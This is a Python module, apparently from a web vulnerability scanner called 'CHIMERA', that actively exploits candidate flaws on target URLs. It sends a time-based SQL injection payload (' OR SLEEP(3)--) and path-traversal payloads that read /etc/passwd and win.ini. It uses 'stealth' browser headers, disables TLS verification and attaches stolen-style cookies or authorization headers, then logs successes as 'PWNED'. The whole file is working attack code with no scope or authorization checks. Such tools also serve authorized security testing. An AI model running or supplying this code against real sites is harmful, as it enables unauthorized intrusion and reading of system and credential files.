# modules/exploiter.py
import requests
import time
from urllib.parse import urlparse, urljoin

class ExploiterEngine:
    def __init__(self, verified_vulns, auth_header='', logger_callback=None):
        self.vulns = verified_vulns
        self.auth_header = auth_header
        self.log = logger_callback if logger_callback else print
        self.session = requests.Session()
        
        # Configure session with stealth headers
        self.session.verify = False
        self.session.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
        }
        
        # Inject Auth if provided
        if self.auth_header:
            if "Cookie:" in self.auth_header:
                self.session.headers['Cookie'] = self.auth_header.replace("Cookie:", "").strip()
            elif "Authorization:" in self.auth_header:
                self.session.headers['Authorization'] = self.auth_header.replace("Authorization:", "").strip()

    def verify_sqli(self, url, original_payload):
        """Attempts to confirm SQLi using Time-Based Blind injection."""
        # A payload that asks the DB to sleep for 3 seconds
        # We use a polyglot-style sleep that works on MySQL/PostgreSQL
        sleep_payload = "' OR SLEEP(3)--" 
        
        # If the original payload was generic, we append our verification payload
        target_url = f"{url}{sleep_payload}"
        
        try:
            start = time.time()
            res = self.session.get(target_url, timeout=10)
            end = time.time()
            
            duration = end - start
            
            # If the response took > 3 seconds but < 10 seconds, it likely worked
            if 3.0 < duration < 8.0:
                return True
        except:
            pass
        return False

    def verify_lfi(self, url):
        """Attempts to read common system files."""
        lfi_payloads = [
            "../../../../../../../../etc/passwd",
            "../../../../../../../../windows/win.ini"
        ]
        
        for payload in lfi_payloads:
            # Assume the vuln param is at the end or needs replacing
            # For simplicity in this demo, we append. In a real tool, we'd replace params.
            target = f"{url}{payload}"
            try:
                res = self.session.get(target, timeout=5)
                if "root:x:0:0" in res.text or "[extensions]" in res.text:
                    return True
            except:
                pass
        return False

    def start(self):
        self.log("⚔️ [EXPLOIT] Initiating Active Verification Protocols...")
        confirmed_exploits = []
        
        for v in self.vulns:
            is_confirmed = False
            
            # 1. SQL Injection Verification
            if "SQL" in v['type'].upper():
                self.log(f"   └── Testing SQLi candidate: {v['url']}")
                if self.verify_sqli(v['url'], v['payload']):
                    v['severity'] = "CRITICAL (EXPLOIT CONFIRMED)"
                    v['risk_score'] = 10
                    v['description'] += " [CHIMERA VERIFIED: Time-based SQLi executed successfully]"
                    is_confirmed = True
            
            # 2. Path Traversal / LFI Verification
            elif "TRAVERSAL" in v['type'].upper() or "FILE INCLUSION" in v['type'].upper():
                self.log(f"   └── Testing LFI candidate: {v['url']}")
                if self.verify_lfi(v['url']):
                    v['severity'] = "CRITICAL (EXPLOIT CONFIRMED)"
                    v['risk_score'] = 10
                    v['description'] += " [CHIMERA VERIFIED: System file read access confirmed]"
                    is_confirmed = True

            if is_confirmed:
                self.log(f"🔥 [PWNED] Exploit successful at {v['url']}")
            
            confirmed_exploits.append(v)
            
        return confirmed_exploits